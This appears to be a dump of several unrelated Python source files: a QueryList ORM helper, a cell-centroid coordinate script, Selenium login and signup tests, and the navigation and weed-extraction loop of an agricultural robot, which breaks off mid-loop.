                         self._query,
                         order_by=self._order_by,
                         limit=self._limit,
                         offset=self._offset,
                         fields=self._fields,
                         links_to_names=self._links_to_names)

    def exclude(self, **query):
        """Filter this QueryList, returning a new QueryList, as in filter(),
        but excluding the entries that match the query.
        """
        if self._query != '':
            query = '(%s) AND NOT (%s)' % (self._query, self._build_query(**query))
        else:
            query = 'NOT (%s)' % self._build_query(**query)
        return QueryList(self.model,
                         query,
                         order_by=self._order_by,
                         fields=self._fields,
                         limit=self._limit,
                         offset=self._offset,
                         links_to_names=self._links_to_names)

    def remove_invalid_fields(self, fields):
        """Return only the names from *fields* that the model declares."""
        valid_fields = []
        available_fields = list(self.model._available_fields.keys())
        for field in fields:
            if field in available_fields:
                valid_fields.append(field)
        return valid_fields

    def _get_ordering_field(self, value):
        """Parse an ordering spec like 'name' or '-name'.

        Returns (field_name, descending) or (None, None) when the field is
        not valid for this model.
        """
        desc = False
        field_name = value
        if field_name.startswith('-'):
            desc = True
            field_name = field_name[1:]
        if field_name == 'pk':
            field_name = 'id'
        valid_fields = self.remove_invalid_fields([field_name, ])
        if field_name in valid_fields:
            return field_name, desc
        return None, None

    def order_by(self, value):
        """Return a new QueryList ordered by *value* ('-field' = desc).

        Invalid fields are silently ignored (the previous ordering is kept).
        """
        field_name, desc = self._get_ordering_field(value)
        order_by = self._order_by
        if field_name is not None:
            order_by = field_name
            if desc:
                order_by = f'{order_by} desc'
        return QueryList(self.model,
                         self._query,
                         order_by=order_by,
                         fields=self._fields,
                         limit=self._limit,
                         offset=self._offset,
                         links_to_names=self._links_to_names)

    def count(self):
        """Return the total match count, fetching it from the API once."""
        if self._total == -1:
            result = self.model._connection.get_entries_count(self.model.module_name, self._query, 0)
            self._total = int(result['result_count'], 10)
        return self._total

    def first(self):
        """Return the first result, or None if the queryset is empty."""
        if self._result_cache is None:
            self._fetch_all()
        for obj in self._result_cache[:1]:
            return obj

    def only(self, *_fields):
        """Return a new QueryList restricted to the given (valid) fields."""
        fields = self._fields
        valid_fields = self.remove_invalid_fields(_fields)
        if valid_fields:
            fields = valid_fields
        return QueryList(self.model,
                         self._query,
                         order_by=self._order_by,
                         fields=fields,
                         limit=self._limit,
                         offset=self._offset,
                         links_to_names=self._links_to_names)

    def links_to_names(self, *_links_to_names):
        """Return a new QueryList that also fetches the given link names."""
        links_to_names = self._links_to_names
        if _links_to_names:
            links_to_names = _links_to_names
        return QueryList(self.model,
                         self._query,
                         order_by=self._order_by,
                         fields=self._fields,
                         limit=self._limit,
                         offset=self._offset,
                         links_to_names=links_to_names)
|
998,396 | bf1b45754da2311af2110e1cfe024c8a98e63089 | import sys
import math
import numpy as np
import scipy
import scipy.stats
from scipy.stats import zscore
from scipy.spatial.distance import euclidean, squareform, pdist
import pandas as pd
from scipy.cluster.vq import kmeans2
import image_processing
def read_cell_type(n):
    """Read a whitespace-separated cell-type file.

    Each line holds the class label of one cell as its first token; cells
    are implicitly numbered 1..N in file order.

    Returns a numpy int array ``ma`` of length N+1 where ``ma[0] == -1``
    (sentinel for the unused 0 slot) and ``ma[i]`` is the class of cell i.
    """
    m = {}
    # 'with' guarantees the handle is closed even if parsing raises
    # (the original left the file open on error).
    with open(n) as f:
        for pt, line in enumerate(f, start=1):
            m[pt] = int(line.rstrip("\n").split(" ")[0])
    ma = np.arange(len(m) + 1)
    ma[0] = -1  # cells are 1-based; slot 0 is never a real cell
    for k, cl in m.items():
        ma[k] = cl
    return ma
def norm_centroid(cent):
    """Normalize centroid coordinates in place.

    Maps x via (x - 1000) / 500 and y via (y + 1000) / 500, i.e. shifts
    the raw coordinate frame and rescales to units of 500 px.

    ``cent`` (an (N, 2) float array) is modified in place and returned.
    """
    # Removed the unused ``scale_factor`` local from the original.
    cent[:, 0] = (cent[:, 0] - 1000.0) / 500.0
    cent[:, 1] = (cent[:, 1] + 1000.0) / 500.0
    return cent
def read_centroid(n):
    """Read cell centroids from a CSV file (first header line skipped).

    Each data row carries the field id in column 0 and the centroid x/y in
    its last two columns.

    Returns:
        Xcen: (N, 2) float32 array of centroid coordinates.
        field: (N,) int32 array of field ids.
    """
    # Single pass with 'with' instead of the original's two full reads of
    # the file (one just to count rows) with unclosed-on-error handles.
    coords = []
    fields = []
    with open(n) as f:
        f.readline()  # skip header
        for line in f:
            ll = line.rstrip("\n").split(",")
            coords.append((float(ll[-2]), float(ll[-1])))
            fields.append(int(ll[0]))
    Xcen = np.array(coords, dtype="float32").reshape(-1, 2)
    field = np.array(fields, dtype="int32")
    return Xcen, field
if __name__=="__main__":
    # Load centroids, rotate each point 90 degrees ((x, y) -> (2047 - y, x)),
    # then shift by the per-field offset and print "id,100,x,y" CSV lines.
    Xcen, field = read_centroid("../Cell_centroids.csv")
    Xcen2 = np.empty(Xcen.shape, dtype="float32")
    for i in range(Xcen.shape[0]):
        this_x = Xcen[i,0]
        this_y = Xcen[i,1] * -1.0
        new_x = this_y + (2048 - 1.0)
        new_y = this_x
        Xcen2[i,:] = [new_x, new_y]
    Xcen = Xcen2
    # Historical hard-coded offsets kept for reference:
    '''
    offset = {}
    offset[0] = (0,2048)
    offset[1] = (2048, 2048)
    offset[2] = (offset[1][0]+2048, 2048)
    offset[3] = (offset[2][0]+2048, 2048)
    offset[4] = (offset[3][0]+675, 0)
    '''
    offset = image_processing.read_offset("offset.txt")
    for i in range(Xcen.shape[0]):
        t_field = field[i]
        # Only fields 0..4 have offsets; skip anything else.
        if t_field>=5: continue
        final_x = Xcen[i,0] + offset[t_field][0]
        final_y = Xcen[i,1] + offset[t_field][1]
        sys.stdout.write("%d,%d,%.1f,%.1f\n" % (i+1, 100, final_x, final_y))
|
998,397 | 8ed301e812afd7bf7e033aa2905f5e268ee4a975 | from .base import FunctionalTest
class CreateAccountTest(FunctionalTest):
    """Browser-driven (Selenium) functional tests for login and signup."""

    def test_login(self):
        """Log in with an existing account via the login form."""
        self.browser.get(self.live_server_url)
        # go to login page
        self.browser.find_element_by_id("login-button").click()
        # fill in login data
        self.browser.find_element_by_id("id_username").send_keys("opak")
        self.browser.find_element_by_id("id_password").send_keys("test")
        # login account
        self.browser.find_element_by_css_selector("input.btn.btn-primary").click()

    def test_create_account(self):
        """Register a new account, then log in with it."""
        self.browser.get(self.live_server_url)
        # go to register page
        self.browser.find_element_by_id("registration-button").click()
        # fill in registration data
        self.browser.find_element_by_id("id_username").send_keys("test_user10")
        self.browser.find_element_by_id("id_password").send_keys("testing1234")
        self.browser.find_element_by_id("id_password2").send_keys("testing1234")
        # finish registration
        self.browser.find_element_by_css_selector("input.btn.btn-primary").click()
        # go to login page
        self.browser.find_element_by_id("login-link").click()
        # fill in login data
        self.browser.find_element_by_id("id_username").send_keys("test_user10")
        self.browser.find_element_by_id("id_password").send_keys("testing1234")
        # login account
        self.browser.find_element_by_css_selector("input.btn.btn-primary").click()
998,398 | b8dea4227f5b3ce9665d27bb7a558c1bac6fe006 | """Spiral movement, detection and extraction over given by ABCD points area
BE SURE TO IMPORT ANY NATUITION MODULES AFTER AND ONLY AFTER(!) CONFIG.PY LOADING!
This is required to prevent modules loading corrupted config before main resolves this problem.
"""
import threading
import os
import sys
from turtle import speed
import time
import traceback
from matplotlib.patches import Polygon
import math
import cv2 as cv
import numpy as np
import pickle
import posix_ipc
import json
import glob
import importlib
import subprocess
import datetime
import shutil
import pytz
# load config, if failed - copy and load config backups until success or no more backups
def is_config_empty(config_full_path: str):
    """Return True if the config file contains only blank lines."""
    with open(config_full_path, "r") as config_file:
        return all(line in ("", "\n") for line in config_file)
# Load the active config; if it is missing/empty/broken, fall back to the
# newest valid backup from configBackup/, archiving the broken file first.
try:
    if not os.path.isfile("config/config.py"):
        raise Exception("config file is not exist")
    if is_config_empty("config/config.py"):
        raise Exception("config file is empty")
    from config import config
except KeyboardInterrupt:
    raise KeyboardInterrupt
except Exception as exc:
    print(f"Failed to load current config.py! ({str(exc)})")
    # load config backups
    config_backups = [path for path in glob.glob(
        "configBackup/*.py") if "config" in path]
    for i in range(len(config_backups)):
        # Backup names embed "<day>_<month>_<year>_<H:M:S.*>"; parse that
        # into a timestamp so backups can be sorted newest-first.
        ds = config_backups[i].split("_")[1:]  # date structure
        ds.extend(ds.pop(-1).split(":"))
        ds[-1] = ds[-1][:ds[-1].find(".")]
        config_backups[i] = [
            config_backups[i],
            datetime.datetime(
                day=int(ds[0]),
                month=int(ds[1]),
                year=int(ds[2]),
                hour=int(ds[3]),
                minute=int(ds[4]),
                second=int(ds[5])
            ).timestamp()
        ]
    # make last backups to be placed and used first
    config_backups.sort(key=lambda item: item[1], reverse=True)
    # try to find and set as current last valid config
    for config_backup in config_backups:
        try:
            # Archive the broken config under an ERROR_<timestamp> name
            # before copying the backup into place.
            os.rename(
                "config/config.py",
                f"config/ERROR_{datetime.datetime.now(pytz.timezone('Europe/Berlin')).strftime('%d-%m-%Y %H-%M-%S %f')}"
                f"_config.py")
            shutil.copy(config_backup[0], "config/config.py")
            if is_config_empty("config/config.py"):
                raise Exception("config file is empty")
            from config import config
            print("Successfully loaded config:", config_backup[0])
            break
        except KeyboardInterrupt:
            raise KeyboardInterrupt
        except:
            # Broken backup: silently try the next (older) one.
            pass
    else:
        # for/else: no backup succeeded -- cannot continue without config.
        print("Couldn't find proper 'config.py' file in 'config' and 'configBackup' directories!")
        exit()
import adapters
import navigation
import utility
import detection
import stubs
import extraction
import datacollection
from extraction import ExtractionManagerV3
from notification import RobotStates
from notification import NotificationClient
import connectors
"""
import SensorProcessing
import socketForRTK
from socketForRTK.Client import Client
"""
"""
if config.RECEIVE_FIELD_FROM_RTK:
# import robotEN_JET as rtk
import robotEN_JETSON as rtk
"""
# TODO: temp debug counter
IMAGES_COUNTER = 0
def load_coordinates(file_path):
    """Load a list of positions from a text file.

    Each non-blank line is a space-separated list of floats (e.g.
    "lat lon").

    Returns a list of float lists, one per data line.
    """
    positions_list = []
    with open(file_path) as file:
        for line in file:
            line = line.strip()
            # BUG FIX: the raw line always carries '\n', so the original
            # "line != ''" check never filtered anything and blank lines
            # crashed float(). Strip first and skip genuinely empty lines.
            if line:
                positions_list.append([float(v) for v in line.split(" ")])
    return positions_list
def save_gps_coordinates(points: list, file_name: str):
    """Save points to *file_name* using the QGIS text format.

    Each item is either ``[[lat, lon], extra]`` (written as
    "lat lon extra") or a flat ``[lat, lon]`` (written as "lat lon").
    """
    with open(file_name, "w") as file:
        for point in points:
            if isinstance(point[0], list):
                line = "{} {} {}\n".format(point[0][0], point[0][1], point[1])
            else:
                line = "{} {}\n".format(point[0], point[1])
            file.write(line)
def save_gps_coordinates_raw(points: list, file_name: str):
    """Save each point as one raw ``str(point)`` line in *file_name*."""
    with open(file_name, "w") as file:
        file.writelines(f"{point}\n" for point in points)
def ask_for_ab_points(gps: adapters.GPSUbloxAdapter):
    """Ask user for moving vector AB points.

    Blocks on console input; note that point B is captured first, then
    point A. Returns ``[point_a, point_b]``.
    """
    input("Press enter to save point B")
    point_b = gps.get_fresh_position()
    print("Point B saved.")
    input("Press enter to save point A")
    point_a = gps.get_fresh_position()
    print("Point A saved.")
    return [point_a, point_b]
def save_image(path_to_save, image, counter, session_label, date, sep="_"):
    """
    Assembles image file name and saves received image under this name to specified directory.
    Counter and session label may be passed if was set to None.
    """
    # Each optional part contributes "<sep><part>" when set, "" otherwise;
    # a counter of 0 still counts as present.
    name_parts = [path_to_save]
    name_parts.append(sep + date if date else "")
    name_parts.append(sep + session_label if session_label else "")
    name_parts.append(sep + str(counter) if counter or counter == 0 else "")
    cv.imwrite("".join(name_parts) + ".jpg", image)
def debug_save_image(img_output_dir, label, frame, plants_boxes, undistorted_zone_radius, poly_zone_points_cv):
    """Save a debug copy of *frame*: raw for data gathering, and annotated
    (timestamp, scan zones, detection boxes) when SAVE_DEBUG_IMAGES is on.
    """
    # TODO: temp counter debug
    global IMAGES_COUNTER
    IMAGES_COUNTER += 1

    # TODO: data gathering temporary hardcoded
    if config.ALLOW_GATHERING:
        save_image(config.DATA_GATHERING_DIR, frame, IMAGES_COUNTER,
                   label, utility.get_current_time())

    # debug image saving
    if config.SAVE_DEBUG_IMAGES:
        # draw time on frame
        cur_time = utility.get_current_time()
        left, top = 30, 30
        label_size, base_line = cv.getTextSize(
            cur_time + " No: " + str(IMAGES_COUNTER), cv.FONT_HERSHEY_SIMPLEX, 0.5, 1)
        top = max(top, label_size[1])
        # Red filled box behind the text so the timestamp stays readable.
        frame = cv.rectangle(frame, (left, top - round(1.5 * label_size[1])),
                             (left + round(1.5 *
                                           label_size[0]), top + base_line),
                             (0, 0, 255), cv.FILLED)
        frame = cv.putText(frame, cur_time + " No: " + str(IMAGES_COUNTER), (left, top), cv.FONT_HERSHEY_SIMPLEX, 0.75,
                           (0, 0, 0), 2)

        # draw data on frame: undistorted zone circle, working-zone polygon
        # and the detected plant boxes.
        frame = utility.ImageSaver.draw_zone_circle(
            frame, config.SCENE_CENTER_X, config.SCENE_CENTER_Y, undistorted_zone_radius)
        frame = utility.ImageSaver.draw_zone_poly(frame, poly_zone_points_cv)
        frame = detection.draw_boxes(frame, plants_boxes)
        save_image(img_output_dir, frame, IMAGES_COUNTER, label, cur_time)
def move_to_point_and_extract(coords_from_to: list,
gps: adapters.GPSUbloxAdapter,
vesc_engine: adapters.VescAdapterV4,
smoothie: adapters.SmoothieAdapter,
camera: adapters.CameraAdapterIMX219_170,
periphery_det: detection.YoloOpenCVDetection,
precise_det: detection.YoloOpenCVDetection,
logger_full: utility.Logger,
report_field_names,
trajectory_saver: utility.TrajectorySaver,
working_zone_polygon,
img_output_dir,
nav: navigation.GPSComputing,
data_collector: datacollection.DataCollector,
log_cur_dir,
image_saver: utility.ImageSaver,
notification: NotificationClient,
extraction_manager_v3: ExtractionManagerV3,
ui_msg_queue: posix_ipc.MessageQueue,
SI_speed: float,
wheels_straight: bool,
navigation_prediction: navigation.NavigationPrediction,
future_points: list,
allow_extractions: bool,
x_scan_poly: list,
cur_field):
"""
Moves to the given target point and extracts all weeds on the way.
:param coords_from_to:
:param gps:
:param vesc_engine:
:param smoothie:
:param camera:
:param periphery_det:
:param precise_det:
:param logger_full:
:param report_field_names:
:param trajectory_saver:
:param working_zone_polygon:
:param img_output_dir:
:param nav:
:param data_collector:
:param log_cur_dir:
:param image_saver:
:param notification:
:param extraction_manager_v3:
:param cur_field: None or list of 4 ABCD points which are describing current field robot is working on.
:return:
"""
if config.ALLOW_FIELD_LEAVING_PROTECTION and cur_field is not None and len(cur_field) > 2:
enable_field_leaving_protection = True
else:
enable_field_leaving_protection = False
if config.ALLOW_FIELD_LEAVING_PROTECTION:
if cur_field is None:
msg = f"WARNING: robot field leaving protection WILL NOT WORK as given field is None"
print(msg)
logger_full.write(msg)
elif len(cur_field) < 3:
msg = f"WARNING: robot field leaving protection WILL NOT WORK as given field contains " \
f"{len(cur_field)} points (required ar least 3 points)"
print(msg)
logger_full.write(msg)
extract = SI_speed > 0 and allow_extractions
vesc_speed = SI_speed * config.MULTIPLIER_SI_SPEED_TO_RPM
speed_fast = config.SI_SPEED_FAST * config.MULTIPLIER_SI_SPEED_TO_RPM
vesc_speed_fast = speed_fast if SI_speed >= 0 else -speed_fast
navigation_prediction.set_SI_speed(SI_speed)
raw_angles_history = []
detections_period = []
navigations_period = []
stop_helping_point = nav.get_coordinate(
coords_from_to[1], coords_from_to[0], 90, 1000)
learn_go_straight_index = 0
learn_go_straight_history = []
last_skipped_point = coords_from_to[0]
start_Nav_while = True
last_correct_raw_angle = 0
point_status = "origin"
last_corridor_side = 0
current_corridor_side = 1
almost_start = 0
prev_maneuver_time = time.time()
working_mode_slow = 1
working_mode_fast = 2
working_mode_switching = 3
current_working_mode = working_mode_slow
last_working_mode = 0
# True if robot is close to one of current movement vector points, False otherwise; False if speed limit near points is disabled
close_to_end = config.USE_SPEED_LIMIT
bumper_is_pressed = None
# message queue sending temporary performance tracker
if config.QUEUE_TRACK_PERFORMANCE:
ui_msg_queue_perf = {
"max_time": 0,
"min_time": float("inf"),
"total_time": 0,
"total_sends": 0,
"timeouts_exceeded": 0
}
# x movements during periphery scans
x_scan_cur_idx = 0
x_scan_idx_increasing = True
# set camera to the Y min
res = smoothie.custom_separate_xy_move_to(X_F=config.X_F_MAX,
Y_F=config.Y_F_MAX,
X=smoothie.smoothie_to_mm(
(config.X_MAX - config.X_MIN) / 2, "X"),
Y=smoothie.smoothie_to_mm(config.Y_MIN, "Y"))
if res != smoothie.RESPONSE_OK:
msg = "INIT: Failed to move camera to Y min, smoothie response:\n" + res
logger_full.write(msg + "\n")
smoothie.wait_for_all_actions_done()
# TODO: maybe should add sleep time as camera currently has delay
if config.AUDIT_MODE:
vesc_engine.set_target_rpm(vesc_speed, vesc_engine.PROPULSION_KEY)
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
try:
notificationQueue = posix_ipc.MessageQueue(
config.QUEUE_NAME_UI_NOTIFICATION)
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
notificationQueue = None
degraded_navigation_mode = False
number_navigation_cycle_without_gps = 0
point_reading_t = last_send_gps_time = slow_mode_time = time.time()
have_time_for_inference = True
predictor_next_gps_expected_ts = float("inf")
# main navigation control loop
while True:
# gps point reading time predictor
if have_time_for_inference and config.ALLOW_GPS_TIME_PREDICTIONS_LIMITING_INFERENCE:
if time.time() + config.INFERENCE_MAX_TICK_TIME > predictor_next_gps_expected_ts:
have_time_for_inference = False
if have_time_for_inference:
# EXTRACTION CONTROL
start_t = time.time()
frame = camera.get_image()
frame_t = time.time()
per_det_start_t = time.time()
if extract:
plants_boxes = periphery_det.detect(frame)
else:
plants_boxes = list()
per_det_end_t = time.time()
detections_period.append(per_det_end_t - start_t)
if config.SAVE_DEBUG_IMAGES:
image_saver.save_image(
frame,
img_output_dir,
label="PE_view_M=" + str(current_working_mode),
plants_boxes=plants_boxes)
if config.ALLOW_GATHERING and current_working_mode == working_mode_slow and \
image_saver.get_counter("gathering") < config.DATA_GATHERING_MAX_IMAGES:
image_saver.save_image(frame, config.DATA_GATHERING_DIR,
plants_boxes=plants_boxes, counter_key="gathering")
if extract:
msg = "View frame time: " + str(frame_t - start_t) + "\t\tPeri. det. time: " + \
str(per_det_end_t - per_det_start_t)
else:
msg = "View frame time: " + str(frame_t - start_t) + "\t\tPeri. det. (extractions are off) time: " + \
str(per_det_end_t - per_det_start_t)
logger_full.write(msg + "\n")
# MOVEMENT AND ACTIONS MODES
if config.AUDIT_MODE:
dc_start_t = time.time()
# count detected plant boxes for each type
plants_count = dict()
for plant_box in plants_boxes:
plant_box_name = plant_box.get_name()
if plant_box_name in plants_count:
plants_count[plant_box_name] += 1
else:
plants_count[plant_box_name] = 1
# save info into data collector
for plant_label in plants_count:
data_collector.add_detections_data(plant_label,
math.ceil((plants_count[plant_label]) / config.AUDIT_DIVIDER))
# flush updates into the audit output file and log measured time
if len(plants_boxes) > 0:
data_collector.save_all_data(
log_cur_dir + config.AUDIT_OUTPUT_FILE)
dc_t = time.time() - dc_start_t
msg = "Last scan weeds detected: " + str(len(plants_boxes)) + \
", audit processing tick time: " + str(dc_t)
logger_full.write(msg + "\n")
else:
# slow mode
if current_working_mode == working_mode_slow:
if last_working_mode != current_working_mode:
last_working_mode = current_working_mode
msg = "[Working mode] : slow"
if config.LOG_SPEED_MODES:
logger_full.write(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
if ExtractionManagerV3.any_plant_in_zone(
plants_boxes,
x_scan_poly[x_scan_cur_idx] if config.ALLOW_X_MOVEMENT_DURING_SCANS else working_zone_polygon):
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
if config.VERBOSE_EXTRACT:
msg = "[VERBOSE EXTRACT] Stopping the robot because we have detected plant(s)."
logger_full.write_and_flush(msg+"\n")
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
# TODO this 0 rpm "movement" is to prevent robot movement during extractions, need to add this in future to rest speed modes too
vesc_engine.set_time_to_move(config.VESC_MOVING_TIME, vesc_engine.PROPULSION_KEY)
vesc_engine.set_target_rpm(0, vesc_engine.PROPULSION_KEY)
vesc_engine.set_current_rpm(0, vesc_engine.PROPULSION_KEY)
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
# TODO remove thread init from here!
voltage_thread = threading.Thread(
target=send_voltage_thread_tf,
args=(vesc_engine, ui_msg_queue),
daemon=True)
voltage_thread.start()
# single precise center scan before calling for PDZ scanning and extractions
if config.ALLOW_PRECISE_SINGLE_SCAN_BEFORE_PDZ and not config.ALLOW_X_MOVEMENT_DURING_SCANS:
time.sleep(config.DELAY_BEFORE_2ND_SCAN)
frame = camera.get_image()
plants_boxes = precise_det.detect(frame)
# do PDZ scan and extract all plants if single precise scan got plants in working area
if ExtractionManagerV3.any_plant_in_zone(plants_boxes, working_zone_polygon):
if config.EXTRACTION_MODE == 1:
extraction_manager_v3.extract_all_plants()
elif config.EXTRACTION_MODE == 2:
extraction_manager_v3.mill_all_plants()
slow_mode_time = time.time()
else:
if config.EXTRACTION_MODE == 1:
extraction_manager_v3.extract_all_plants()
elif config.EXTRACTION_MODE == 2:
extraction_manager_v3.mill_all_plants()
slow_mode_time = time.time()
if config.VERBOSE_EXTRACT:
msg = "[VERBOSE EXTRACT] Extract cycle are finish."
logger_full.write_and_flush(msg+"\n")
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
msg = "Applying force step forward after extractions cycle(s)"
logger_full.write(msg + "\n")
if config.VERBOSE:
print(msg)
vesc_engine.set_time_to_move(config.STEP_FORWARD_TIME, vesc_engine.PROPULSION_KEY)
vesc_engine.set_target_rpm(
config.SI_SPEED_STEP_FORWARD * config.MULTIPLIER_SI_SPEED_TO_RPM,
vesc_engine.PROPULSION_KEY)
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
vesc_engine.wait_for_stop(vesc_engine.PROPULSION_KEY)
elif config.SLOW_FAST_MODE and time.time() - slow_mode_time > config.SLOW_MODE_MIN_TIME:
# move cork to fast mode scan position
if config.VERBOSE:
msg = "SLOW MODE: moving cork to fast mode position\n"
logger_full.write(msg)
res = smoothie.custom_separate_xy_move_to(
X_F=config.X_F_MAX,
Y_F=config.Y_F_MAX,
X=smoothie.smoothie_to_mm(
(config.X_MAX - config.X_MIN) / 2, "X"),
Y=smoothie.smoothie_to_mm((config.Y_MAX - config.Y_MIN) * config.SLOW_FAST_MODE_HEAD_FACTOR,
"Y"))
if res != smoothie.RESPONSE_OK:
msg = "INIT: Keeping in slow mode as failed to move camera to fast mode scan position, smoothie's response:\n" + res
logger_full.write(msg + "\n")
else:
msg = "Switching from 'slow mode' to 'switching mode'"
if config.LOG_SPEED_MODES:
logger_full.write(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
current_working_mode = working_mode_switching
# TODO a bug: will not start moving if config.SLOW_MODE_MIN_TIME == 0 or too low (switch speed applies right after slow mode weeds extractions)
if not vesc_engine.is_moving(vesc_engine.PROPULSION_KEY):
vesc_engine.set_time_to_move(config.VESC_MOVING_TIME, vesc_engine.PROPULSION_KEY)
vesc_engine.set_target_rpm(vesc_speed, vesc_engine.PROPULSION_KEY)
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
# switching (from slow to fast) mode
elif current_working_mode == working_mode_switching:
if last_working_mode != current_working_mode:
last_working_mode = current_working_mode
msg = "[Working mode] : switching to fast"
if config.LOG_SPEED_MODES:
logger_full.write(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
if ExtractionManagerV3.any_plant_in_zone(
plants_boxes,
x_scan_poly[x_scan_cur_idx] if config.ALLOW_X_MOVEMENT_DURING_SCANS else working_zone_polygon):
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
if config.VERBOSE:
msg = "Moving cork to slow mode scan position\n"
logger_full.write(msg)
# smoothie.wait_for_all_actions_done()
res = smoothie.custom_separate_xy_move_to(
X_F=config.X_F_MAX,
Y_F=config.Y_F_MAX,
X=smoothie.smoothie_to_mm(
(config.X_MAX - config.X_MIN) / 2, "X"),
Y=smoothie.smoothie_to_mm(config.Y_MIN, "Y"))
if res != smoothie.RESPONSE_OK:
msg = "INIT: Failed to move camera to Y min, smoothie response:\n" + res
logger_full.write(msg + "\n")
smoothie.wait_for_all_actions_done()
current_working_mode = working_mode_slow
slow_mode_time = time.time()
vesc_engine.set_target_rpm(
vesc_speed, vesc_engine.PROPULSION_KEY)
continue
sm_cur_pos = smoothie.get_smoothie_current_coordinates(
convert_to_mms=False)
if abs(sm_cur_pos["X"] - (config.X_MAX - config.X_MIN) / 2) < 0.001 and \
abs(sm_cur_pos["Y"] - (config.Y_MAX - config.Y_MIN) * config.SLOW_FAST_MODE_HEAD_FACTOR) < 0.001:
msg = "Switching from 'switching mode' to 'fast mode'"
if config.LOG_SPEED_MODES:
logger_full.write(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
current_working_mode = working_mode_fast
# fast mode
elif current_working_mode == working_mode_fast:
if last_working_mode != current_working_mode:
last_working_mode = current_working_mode
msg = "[Working mode] : fast"
if config.LOG_SPEED_MODES:
logger_full.write_and_flush(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
if ExtractionManagerV3.any_plant_in_zone(
plants_boxes,
x_scan_poly[x_scan_cur_idx] if config.ALLOW_X_MOVEMENT_DURING_SCANS else working_zone_polygon):
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
if config.VERBOSE:
msg = "Moving cork to slow mode scan position\n"
logger_full.write(msg)
# smoothie.wait_for_all_actions_done()
res = smoothie.custom_separate_xy_move_to(
X_F=config.X_F_MAX,
Y_F=config.Y_F_MAX,
X=smoothie.smoothie_to_mm(
(config.X_MAX - config.X_MIN) / 2, "X"),
Y=smoothie.smoothie_to_mm(config.Y_MIN, "Y"))
if res != smoothie.RESPONSE_OK:
msg = "INIT: Failed to move camera to Y min, smoothie response:\n" + res
logger_full.write(msg + "\n")
smoothie.wait_for_all_actions_done()
msg = "Switching from 'fast mode' to 'slow mode'"
if config.LOG_SPEED_MODES:
logger_full.write(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
current_working_mode = working_mode_slow
slow_mode_time = time.time()
# TODO dont need anymore? as rpm is set at the end of slow mode
# vesc_engine.set_rpm(vesc_speed, vesc_engine.PROPULSION_KEY)
continue
elif close_to_end:
cur_vesc_rpm = vesc_engine.get_current_rpm(
vesc_engine.PROPULSION_KEY)
if cur_vesc_rpm != vesc_speed:
msg = f"Applying slow speed {vesc_speed} at 'fast mode' " \
f"(was {cur_vesc_rpm}) " \
f"because of close_to_end flag trigger"
if config.LOG_SPEED_MODES:
logger_full.write(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
vesc_engine.set_target_rpm(
vesc_speed, vesc_engine.PROPULSION_KEY)
vesc_engine.set_current_rpm(
vesc_speed, vesc_engine.PROPULSION_KEY)
else:
cur_vesc_rpm = vesc_engine.get_current_rpm(
vesc_engine.PROPULSION_KEY)
if cur_vesc_rpm != vesc_speed_fast:
msg = f"Applying fast speed {vesc_speed_fast} at 'fast mode' (was {cur_vesc_rpm})"
if config.LOG_SPEED_MODES:
logger_full.write(msg + "\n")
if config.PRINT_SPEED_MODES:
print(msg)
vesc_engine.set_target_rpm(
vesc_speed_fast, vesc_engine.PROPULSION_KEY)
vesc_engine.set_current_rpm(
vesc_speed_fast, vesc_engine.PROPULSION_KEY)
# NAVIGATION CONTROL
cur_pos_obj = gps.get_last_position_v2()
cur_pos = cur_pos_obj.as_old_list
nav_start_t = time.time()
if start_Nav_while:
navigation_period = 1
else:
navigation_period = nav_start_t - prev_maneuver_time
navigations_period.append(navigation_period)
# time reference to decide the number of detection before resuming gps.get
prev_maneuver_time = nav_start_t
# print("tock")
if start_Nav_while:
prev_pos_obj = cur_pos_obj
prev_pos = prev_pos_obj.as_old_list
start_Nav_while = False
# mu_navigations_period, sigma_navigations_period = utility.mu_sigma(navigations_period)
navigation_prediction.set_current_lat_long(cur_pos)
# skip same points (non-blocking reading returns old point if new point isn't available yet)
if math.isclose(cur_pos_obj.creation_ts, prev_pos_obj.creation_ts):
# stop robot if there's no new points for a while
if time.time() - point_reading_t > config.GPS_POINT_TIME_BEFORE_STOP:
vesc_engine.stop_moving(vesc_engine.PROPULSION_KEY)
msg = f"Stopping the robot due to exceeding time 'GPS_POINT_TIME_BEFORE_STOP=" \
f"{config.GPS_POINT_TIME_BEFORE_STOP}' limit without new gps points from adapter"
logger_full.write_and_flush(msg + "\n")
data_collector.add_vesc_moving_time_data(
vesc_engine.get_last_movement_time(vesc_engine.PROPULSION_KEY))
gps_reconnect_ts = time.time()
while True:
cur_pos_obj = gps.get_last_position_v2()
cur_pos = cur_pos_obj.as_old_list
if math.isclose(cur_pos_obj.creation_ts, prev_pos_obj.creation_ts):
# reconnect gps adapter to ublox if there's no gps points for a while
if time.time() - gps_reconnect_ts > config.GPS_POINT_TIME_BEFORE_RECONNECT:
gps.reconnect()
gps_reconnect_ts = time.time()
msg = "Called GPS adapter to reconnect to ublox due to waiting too much for a new GPS " \
"point (new points filter)"
if config.VERBOSE:
print(msg)
logger_full.write_and_flush(msg + "\n")
else:
msg = "New GPS point received, continuing movement"
logger_full.write_and_flush(msg + "\n")
vesc_engine.start_moving(vesc_engine.PROPULSION_KEY)
break
else:
continue
# gps points reading time predictor
predictor_next_gps_expected_ts = cur_pos_obj.receiving_ts + config.GPS_POINT_WAIT_TIME_MAX
have_time_for_inference = True
# points filter by quality flag
